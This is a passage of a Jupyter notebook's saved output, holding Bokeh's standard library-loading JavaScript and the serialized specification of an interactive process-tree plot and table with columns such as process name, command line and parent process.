bk_div.children[0].attributes;\n", " for (var i = 0; i < script_attrs.length; i++) {\n", " toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n", " toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n", " }\n", " // store reference to server id on output_area\n", " output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n", " }\n", " }\n", "\n", " function register_renderer(events, OutputArea) {\n", "\n", " function append_mime(data, metadata, element) {\n", " // create a DOM node to render to\n", " var toinsert = this.create_output_subarea(\n", " metadata,\n", " CLASS_NAME,\n", " EXEC_MIME_TYPE\n", " );\n", " this.keyboard_manager.register_events(toinsert);\n", " // Render to node\n", " var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n", " render(props, toinsert[toinsert.length - 1]);\n", " element.append(toinsert);\n", " return toinsert\n", " }\n", "\n", " /* Handle when an output is cleared or removed */\n", " events.on('clear_output.CodeCell', handleClearOutput);\n", " events.on('delete.Cell', handleClearOutput);\n", "\n", " /* Handle when a new output is added */\n", " events.on('output_added.OutputArea', handleAddOutput);\n", "\n", " /**\n", " * Register the mime type and append_mime function with output_area\n", " */\n", " OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n", " /* Is output safe? */\n", " safe: true,\n", " /* Index of renderer in `output_area.display_order` */\n", " index: 0\n", " });\n", " }\n", "\n", " // register the mime type if in Jupyter Notebook environment and previously unregistered\n", " if (root.Jupyter !== undefined) {\n", " var events = require('base/js/events');\n", " var OutputArea = require('notebook/js/outputarea').OutputArea;\n", "\n", " if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n", " register_renderer(events, OutputArea);\n", " }\n", " }\n", "\n", " \n", " if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n", " root._bokeh_timeout = Date.now() + 5000;\n", " root._bokeh_failed_load = false;\n", " }\n", "\n", " var NB_LOAD_WARNING = {'data': {'text/html':\n", " \"
\\n\"+\n", " \"

\\n\"+\n", " \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n", " \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n", " \"

\\n\"+\n", " \"\\n\"+\n", " \"\\n\"+\n", " \"from bokeh.resources import INLINE\\n\"+\n", " \"output_notebook(resources=INLINE)\\n\"+\n", " \"\\n\"+\n", " \"
\"}};\n", "\n", " function display_loaded() {\n", " var el = document.getElementById(\"1562\");\n", " if (el != null) {\n", " el.textContent = \"BokehJS is loading...\";\n", " }\n", " if (root.Bokeh !== undefined) {\n", " if (el != null) {\n", " el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n", " }\n", " } else if (Date.now() < root._bokeh_timeout) {\n", " setTimeout(display_loaded, 100)\n", " }\n", " }\n", "\n", "\n", " function run_callbacks() {\n", " try {\n", " root._bokeh_onload_callbacks.forEach(function(callback) {\n", " if (callback != null)\n", " callback();\n", " });\n", " } finally {\n", " delete root._bokeh_onload_callbacks\n", " }\n", " console.debug(\"Bokeh: all callbacks have finished\");\n", " }\n", "\n", " function load_libs(css_urls, js_urls, callback) {\n", " if (css_urls == null) css_urls = [];\n", " if (js_urls == null) js_urls = [];\n", "\n", " root._bokeh_onload_callbacks.push(callback);\n", " if (root._bokeh_is_loading > 0) {\n", " console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n", " return null;\n", " }\n", " if (js_urls == null || js_urls.length === 0) {\n", " run_callbacks();\n", " return null;\n", " }\n", " console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n", " root._bokeh_is_loading = css_urls.length + js_urls.length;\n", "\n", " function on_load() {\n", " root._bokeh_is_loading--;\n", " if (root._bokeh_is_loading === 0) {\n", " console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n", " run_callbacks()\n", " }\n", " }\n", "\n", " function on_error() {\n", " console.error(\"failed to load \" + url);\n", " }\n", "\n", " for (var i = 0; i < css_urls.length; i++) {\n", " var url = css_urls[i];\n", " const element = document.createElement(\"link\");\n", " element.onload = on_load;\n", " element.onerror = on_error;\n", " element.rel = \"stylesheet\";\n", " element.type = \"text/css\";\n", " element.href = url;\n", " console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n", " document.body.appendChild(element);\n", " }\n", "\n", " const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\": \"kLr4fYcqcSpbuI95brIH3vnnYCquzzSxHPU6XGQCIkQRGJwhg0StNbj1eegrHs12\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\": \"xIGPmVtaOm+z0BqfSOMn4lOR6ciex448GIKG4eE61LsAvmGj48XcMQZtKcE/UXZe\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\": \"Dc9u1wF/0zApGIWoBbH77iWEHtdmkuYWG839Uzmv8y8yBLXebjO9ZnERsde5Ln/P\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\": \"cT9JaBz7GiRXdENrJLZNSC6eMNF3nh3fa5fTF51Svp+ukxPdwcU5kGXGPBgDCa2j\"};\n", "\n", " for (var i = 0; i < js_urls.length; i++) {\n", " var url = js_urls[i];\n", " var element = document.createElement('script');\n", " element.onload = on_load;\n", " element.onerror = on_error;\n", " element.async = false;\n", " element.src = url;\n", " if (url in hashes) {\n", " element.crossOrigin = \"anonymous\";\n", " element.integrity = \"sha384-\" + hashes[url];\n", " }\n", " console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n", " document.head.appendChild(element);\n", " }\n", " };\n", "\n", " function inject_raw_css(css) {\n", " const element = document.createElement(\"style\");\n", " element.appendChild(document.createTextNode(css));\n", " document.body.appendChild(element);\n", " }\n", "\n", " \n", " var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\"];\n", " var css_urls = [];\n", " \n", "\n", " var inline_js = [\n", " function(Bokeh) {\n", " Bokeh.set_log_level(\"info\");\n", " },\n", " function(Bokeh) {\n", " \n", " \n", " }\n", " ];\n", "\n", " function run_inline_js() {\n", " \n", " if (root.Bokeh !== undefined || force === true) {\n", " \n", " for (var i = 0; i < inline_js.length; i++) {\n", " inline_js[i].call(root, root.Bokeh);\n", " }\n", " if (force === true) {\n", " display_loaded();\n", " }} else if (Date.now() < root._bokeh_timeout) {\n", " setTimeout(run_inline_js, 100);\n", " } else if (!root._bokeh_failed_load) {\n", " console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n", " root._bokeh_failed_load = true;\n", " } else if (force !== true) {\n", " var cell = $(document.getElementById(\"1562\")).parents('.cell').data().cell;\n", " cell.output_area.append_execute_result(NB_LOAD_WARNING)\n", " }\n", "\n", " }\n", "\n", " if (root._bokeh_is_loading === 0) {\n", " console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n", " run_inline_js();\n", " } else {\n", " load_libs(css_urls, js_urls, function() {\n", " console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n", " run_inline_js();\n", " });\n", " }\n", "}(window));" ], "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n function now() {\n return new Date();\n }\n\n var force = true;\n\n if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n root._bokeh_onload_callbacks = [];\n root._bokeh_is_loading = undefined;\n }\n\n \n\n \n if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n root._bokeh_timeout = Date.now() + 5000;\n root._bokeh_failed_load = false;\n }\n\n var NB_LOAD_WARNING = {'data': {'text/html':\n \"
\\n\"+\n \"

\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"

\\n\"+\n \"\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"\\n\"+\n \"
\"}};\n\n function display_loaded() {\n var el = document.getElementById(\"1562\");\n if (el != null) {\n el.textContent = \"BokehJS is loading...\";\n }\n if (root.Bokeh !== undefined) {\n if (el != null) {\n el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(display_loaded, 100)\n }\n }\n\n\n function run_callbacks() {\n try {\n root._bokeh_onload_callbacks.forEach(function(callback) {\n if (callback != null)\n callback();\n });\n } finally {\n delete root._bokeh_onload_callbacks\n }\n console.debug(\"Bokeh: all callbacks have finished\");\n }\n\n function load_libs(css_urls, js_urls, callback) {\n if (css_urls == null) css_urls = [];\n if (js_urls == null) js_urls = [];\n\n root._bokeh_onload_callbacks.push(callback);\n if (root._bokeh_is_loading > 0) {\n console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n return null;\n }\n if (js_urls == null || js_urls.length === 0) {\n run_callbacks();\n return null;\n }\n console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n function on_load() {\n root._bokeh_is_loading--;\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n run_callbacks()\n }\n }\n\n function on_error() {\n console.error(\"failed to load \" + url);\n }\n\n for (var i = 0; i < css_urls.length; i++) {\n var url = css_urls[i];\n const element = document.createElement(\"link\");\n element.onload = on_load;\n element.onerror = on_error;\n element.rel = \"stylesheet\";\n element.type = \"text/css\";\n element.href = url;\n console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n document.body.appendChild(element);\n }\n\n const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\": \"kLr4fYcqcSpbuI95brIH3vnnYCquzzSxHPU6XGQCIkQRGJwhg0StNbj1eegrHs12\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\": \"xIGPmVtaOm+z0BqfSOMn4lOR6ciex448GIKG4eE61LsAvmGj48XcMQZtKcE/UXZe\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\": \"Dc9u1wF/0zApGIWoBbH77iWEHtdmkuYWG839Uzmv8y8yBLXebjO9ZnERsde5Ln/P\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\": \"cT9JaBz7GiRXdENrJLZNSC6eMNF3nh3fa5fTF51Svp+ukxPdwcU5kGXGPBgDCa2j\"};\n\n for (var i = 0; i < js_urls.length; i++) {\n var url = js_urls[i];\n var element = document.createElement('script');\n element.onload = on_load;\n element.onerror = on_error;\n element.async = false;\n element.src = url;\n if (url in hashes) {\n element.crossOrigin = \"anonymous\";\n element.integrity = \"sha384-\" + hashes[url];\n }\n console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n document.head.appendChild(element);\n }\n };\n\n function inject_raw_css(css) {\n const element = document.createElement(\"style\");\n element.appendChild(document.createTextNode(css));\n document.body.appendChild(element);\n }\n\n \n var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\"];\n var css_urls = [];\n \n\n var inline_js = [\n function(Bokeh) {\n Bokeh.set_log_level(\"info\");\n },\n function(Bokeh) {\n \n \n }\n ];\n\n function run_inline_js() {\n \n if (root.Bokeh !== undefined || force === true) {\n \n for (var i = 0; i < inline_js.length; i++) {\n inline_js[i].call(root, root.Bokeh);\n }\n if (force === true) {\n display_loaded();\n }} else if (Date.now() < root._bokeh_timeout) {\n setTimeout(run_inline_js, 100);\n } else if (!root._bokeh_failed_load) {\n console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n root._bokeh_failed_load = true;\n } else if (force !== true) {\n var cell = $(document.getElementById(\"1562\")).parents('.cell').data().cell;\n cell.output_area.append_execute_result(NB_LOAD_WARNING)\n }\n\n }\n\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n run_inline_js();\n } else {\n load_libs(css_urls, js_urls, function() {\n console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n run_inline_js();\n });\n }\n}(window));" }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": [ "\n", "\n", "\n", "\n", "\n", "\n", "
\n" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": [ "(function(root) {\n", " function embed_document(root) {\n", " \n", " var docs_json = {\"44d120b6-6abe-4c10-8699-9a55653f0815\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1669\"},{\"id\":\"1683\"}]},\"id\":\"1685\",\"type\":\"Column\"},{\"attributes\":{},\"id\":\"1708\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1716\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"1711\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"formatter\":{\"id\":\"1720\"},\"ticker\":{\"id\":\"1637\"},\"visible\":false},\"id\":\"1636\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1700\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1701\",\"type\":\"StringFormatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.4},\"fill_color\":{\"field\":\"Rarity\",\"transform\":{\"id\":\"1564\"}},\"height\":{\"units\":\"data\",\"value\":0.95},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1596\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1598\",\"type\":\"Rect\"},{\"attributes\":{},\"id\":\"1709\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1692\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1645\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"1695\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1704\",\"type\":\"StringEditor\"},{\"attributes\":{\"overlay\":{\"id\":\"1650\"}},\"id\":\"1646\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"1707\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1715\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"1699\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1696\",\"type\":\"StringEditor\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"1664\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1644\"},{\"id\":\"1645\"},{\"id\":\"1646\"},{\"id\":\"1647\"},{\"id\":\"1648\"},{\"id\":\"1649\"},{\"id\":\"1664\"}]},\"id\":\"1651\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"1649\",\"type\":\"HelpTool\"},{\"attributes\":{\"source\":{\"id\":\"1563\"}},\"id\":\"1601\",\"type\":\"CDSView\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"1650\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"1718\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"range\":{\"id\":\"1571\"},\"value\":0.25},\"id\":\"1610\",\"type\":\"Dodge\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"Rarity\",\"transform\":{\"id\":\"1564\"}},\"height\":{\"units\":\"data\",\"value\":0.8},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1658\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1661\",\"type\":\"Rect\"},{\"attributes\":{\"data_source\":{\"id\":\"1563\"},\"glyph\":{\"id\":\"1660\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1661\"},\"selection_glyph\":null,\"view\":{\"id\":\"1663\"}},\"id\":\"1662\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1710\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"1706\",\"type\":\"StringEditor\"},{\"attributes\":{\"range\":{\"id\":\"1569\"},\"value\":0.1},\"id\":\"1602\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1637\",\"type\":\"BasicTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"1563\"},\"glyph\":{\"id\":\"1605\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1606\"},\"selection_glyph\":null,\"view\":{\"id\":\"1608\"}},\"id\":\"1607\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1705\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1587\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"1713\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"range\":{\"id\":\"1569\"},\"value\":0.1},\"id\":\"1609\",\"type\":\"Dodge\"},{\"attributes\":{\"editor\":{\"id\":\"1698\"},\"field\":\"NewProcessName\",\"formatter\":{\"id\":\"1699\"},\"title\":\"NewProcessName\"},\"id\":\"1677\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1720\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1700\"},\"field\":\"CommandLine\",\"formatter\":{\"id\":\"1701\"},\"title\":\"CommandLine\"},\"id\":\"1678\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1702\",\"type\":\"StringEditor\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1585\"},{\"id\":\"1586\"},{\"id\":\"1587\"},{\"id\":\"1588\"},{\"id\":\"1594\"}]},\"id\":\"1589\",\"type\":\"Toolbar\"},{\"attributes\":{\"editor\":{\"id\":\"1704\"},\"field\":\"ParentProcessName\",\"formatter\":{\"id\":\"1705\"},\"title\":\"ParentProcessName\"},\"id\":\"1680\",\"type\":\"TableColumn\"},{\"attributes\":{\"text\":{\"field\":\"PID\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1616\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1617\"}}},\"id\":\"1620\",\"type\":\"Text\"},{\"attributes\":{},\"id\":\"1703\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1648\",\"type\":\"ResetTool\"},{\"attributes\":{\"axis\":{\"id\":\"1640\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"1643\",\"type\":\"Grid\"},{\"attributes\":{\"source\":{\"id\":\"1563\"}},\"id\":\"1615\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1586\",\"type\":\"ResetTool\"},{\"attributes\":{\"editor\":{\"id\":\"1702\"},\"field\":\"ProcessId\",\"formatter\":{\"id\":\"1703\"},\"title\":\"ProcessId\"},\"id\":\"1679\",\"type\":\"TableColumn\"},{\"attributes\":{\"text\":{\"field\":\"Exe\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1609\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1610\"}}},\"id\":\"1613\",\"type\":\"Text\"},{\"attributes\":{\"data_source\":{\"id\":\"1563\"},\"glyph\":{\"id\":\"1612\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1613\"},\"selection_glyph\":null,\"view\":{\"id\":\"1615\"}},\"id\":\"1614\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"editor\":{\"id\":\"1708\"},\"field\":\"Rarity\",\"formatter\":{\"id\":\"1709\"},\"title\":\"Rarity\"},\"id\":\"1682\",\"type\":\"TableColumn\"},{\"attributes\":{\"data_source\":{\"id\":\"1563\"},\"glyph\":{\"id\":\"1619\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1620\"},\"selection_glyph\":null,\"view\":{\"id\":\"1622\"}},\"id\":\"1621\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"editor\":{\"id\":\"1706\"},\"field\":\"TargetLogonId\",\"formatter\":{\"id\":\"1707\"},\"title\":\"TargetLogonId\"},\"id\":\"1681\",\"type\":\"TableColumn\"},{\"attributes\":{\"text\":{\"field\":\"cmd\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1602\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1603\"}}},\"id\":\"1605\",\"type\":\"Text\"},{\"attributes\":{\"text\":{\"field\":\"Exe\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1609\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1610\"}}},\"id\":\"1612\",\"type\":\"Text\"},{\"attributes\":{},\"id\":\"1641\",\"type\":\"BasicTicker\"},{\"attributes\":{\"range\":{\"id\":\"1569\"},\"value\":1.8},\"id\":\"1616\",\"type\":\"Dodge\"},{\"attributes\":{\"range\":{\"id\":\"1571\"},\"value\":0.25},\"id\":\"1617\",\"type\":\"Dodge\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"Rarity\",\"transform\":{\"id\":\"1564\"}},\"height\":{\"units\":\"data\",\"value\":0.95},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1596\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1599\",\"type\":\"Rect\"},{\"attributes\":{\"source\":{\"id\":\"1563\"}},\"id\":\"1608\",\"type\":\"CDSView\"},{\"attributes\":{\"source\":{\"id\":\"1563\"}},\"id\":\"1684\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1689\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1647\",\"type\":\"SaveTool\"},{\"attributes\":{\"formatter\":{\"id\":\"1718\"},\"ticker\":{\"id\":\"1641\"},\"visible\":false},\"id\":\"1640\",\"type\":\"LinearAxis\"},{\"attributes\":{\"editor\":{\"id\":\"1696\"},\"field\":\"NewProcessId\",\"formatter\":{\"id\":\"1697\"},\"title\":\"NewProcessId\"},\"id\":\"1676\",\"type\":\"TableColumn\"},{\"attributes\":{\"text\":{\"field\":\"PID\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1616\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1617\"}}},\"id\":\"1619\",\"type\":\"Text\"},{\"attributes\":{\"source\":{\"id\":\"1563\"}},\"id\":\"1622\",\"type\":\"CDSView\"},{\"attributes\":{\"high\":1.0,\"low\":0.05263157894736842,\"palette\":[\"#440154\",\"#440255\",\"#440357\",\"#450558\",\"#45065A\",\"#45085B\",\"#46095C\",\"#460B5E\",\"#460C5F\",\"#460E61\",\"#470F62\",\"#471163\",\"#471265\",\"#471466\",\"#471567\",\"#471669\",\"#47186A\",\"#48196B\",\"#481A6C\",\"#481C6E\",\"#481D6F\",\"#481E70\",\"#482071\",\"#482172\",\"#482273\",\"#482374\",\"#472575\",\"#472676\",\"#472777\",\"#472878\",\"#472A79\",\"#472B7A\",\"#472C7B\",\"#462D7C\",\"#462F7C\",\"#46307D\",\"#46317E\",\"#45327F\",\"#45347F\",\"#453580\",\"#453681\",\"#443781\",\"#443982\",\"#433A83\",\"#433B83\",\"#433C84\",\"#423D84\",\"#423E85\",\"#424085\",\"#414186\",\"#414286\",\"#404387\",\"#404487\",\"#3F4587\",\"#3F4788\",\"#3E4888\",\"#3E4989\",\"#3D4A89\",\"#3D4B89\",\"#3D4C89\",\"#3C4D8A\",\"#3C4E8A\",\"#3B508A\",\"#3B518A\",\"#3A528B\",\"#3A538B\",\"#39548B\",\"#39558B\",\"#38568B\",\"#38578C\",\"#37588C\",\"#37598C\",\"#365A8C\",\"#365B8C\",\"#355C8C\",\"#355D8C\",\"#345E8D\",\"#345F8D\",\"#33608D\",\"#33618D\",\"#32628D\",\"#32638D\",\"#31648D\",\"#31658D\",\"#31668D\",\"#30678D\",\"#30688D\",\"#2F698D\",\"#2F6A8D\",\"#2E6B8E\",\"#2E6C8E\",\"#2E6D8E\",\"#2D6E8E\",\"#2D6F8E\",\"#2C708E\",\"#2C718E\",\"#2C728E\",\"#2B738E\",\"#2B748E\",\"#2A758E\",\"#2A768E\",\"#2A778E\",\"#29788E\",\"#29798E\",\"#287A8E\",\"#287A8E\",\"#287B8E\",\"#277C8E\",\"#277D8E\",\"#277E8E\",\"#267F8E\",\"#26808E\",\"#26818E\",\"#25828E\",\"#25838D\",\"#24848D\",\"#24858D\",\"#24868D\",\"#23878D\",\"#23888D\",\"#23898D\",\"#22898D\",\"#228A8D\",\"#228B8D\",\"#218C8D\",\"#218D8C\",\"#218E8C\",\"#208F8C\",\"#20908C\",\"#20918C\",\"#1F928C\",\"#1F938B\",\"#1F948B\",\"#1F958B\",\"#1F968B\",\"#1E978A\",\"#1E988A\",\"#1E998A\",\"#1E998A\",\"#1E9A89\",\"#1E9B89\",\"#1E9C89\",\"#1E9D88\",\"#1E9E88\",\"#1E9F88\",\"#1EA087\",\"#1FA187\",\"#1FA286\",\"#1FA386\",\"#20A485\",\"#20A585\",\"#21A685\",\"#21A784\",\"#22A784\",\"#23A883\",\"#23A982\",\"#24AA82\",\"#25AB81\",\"#26AC81\",\"#27AD80\",\"#28AE7F\",\"#29AF7F\",\"#2AB07E\",\"#2BB17D\",\"#2CB17D\",\"#2EB27C\",\"#2FB37B\",\"#30B47A\",\"#32B57A\",\"#33B679\",\"#35B778\",\"#36B877\",\"#38B976\",\"#39B976\",\"#3BBA75\",\"#3DBB74\",\"#3EBC73\",\"#40BD72\",\"#42BE71\",\"#44BE70\",\"#45BF6F\",\"#47C06E\",\"#49C16D\",\"#4BC26C\",\"#4DC26B\",\"#4FC369\",\"#51C468\",\"#53C567\",\"#55C666\",\"#57C665\",\"#59C764\",\"#5BC862\",\"#5EC961\",\"#60C960\",\"#62CA5F\",\"#64CB5D\",\"#67CC5C\",\"#69CC5B\",\"#6BCD59\",\"#6DCE58\",\"#70CE56\",\"#72CF55\",\"#74D054\",\"#77D052\",\"#79D151\",\"#7CD24F\",\"#7ED24E\",\"#81D34C\",\"#83D34B\",\"#86D449\",\"#88D547\",\"#8BD546\",\"#8DD644\",\"#90D643\",\"#92D741\",\"#95D73F\",\"#97D83E\",\"#9AD83C\",\"#9DD93A\",\"#9FD938\",\"#A2DA37\",\"#A5DA35\",\"#A7DB33\",\"#AADB32\",\"#ADDC30\",\"#AFDC2E\",\"#B2DD2C\",\"#B5DD2B\",\"#B7DD29\",\"#BADE27\",\"#BDDE26\",\"#BFDF24\",\"#C2DF22\",\"#C5DF21\",\"#C7E01F\",\"#CAE01E\",\"#CDE01D\",\"#CFE11C\",\"#D2E11B\",\"#D4E11A\",\"#D7E219\",\"#DAE218\",\"#DCE218\",\"#DFE318\",\"#E1E318\",\"#E4E318\",\"#E7E419\",\"#E9E419\",\"#ECE41A\",\"#EEE51B\",\"#F1E51C\",\"#F3E51E\",\"#F6E61F\",\"#F8E621\",\"#FAE622\",\"#FDE724\"]},\"id\":\"1564\",\"type\":\"LinearColorMapper\"},{\"attributes\":{\"callback\":null},\"id\":\"1588\",\"type\":\"TapTool\"},{\"attributes\":{},\"id\":\"1690\",\"type\":\"StringEditor\"},{\"attributes\":{\"ticks\":[1,2,3,4,5,6,7,8]},\"id\":\"1625\",\"type\":\"FixedTicker\"},{\"attributes\":{},\"id\":\"1693\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1691\",\"type\":\"StringFormatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"field\":\"Rarity\",\"transform\":{\"id\":\"1564\"}},\"height\":{\"units\":\"data\",\"value\":0.8},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1658\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1660\",\"type\":\"Rect\"},{\"attributes\":{},\"id\":\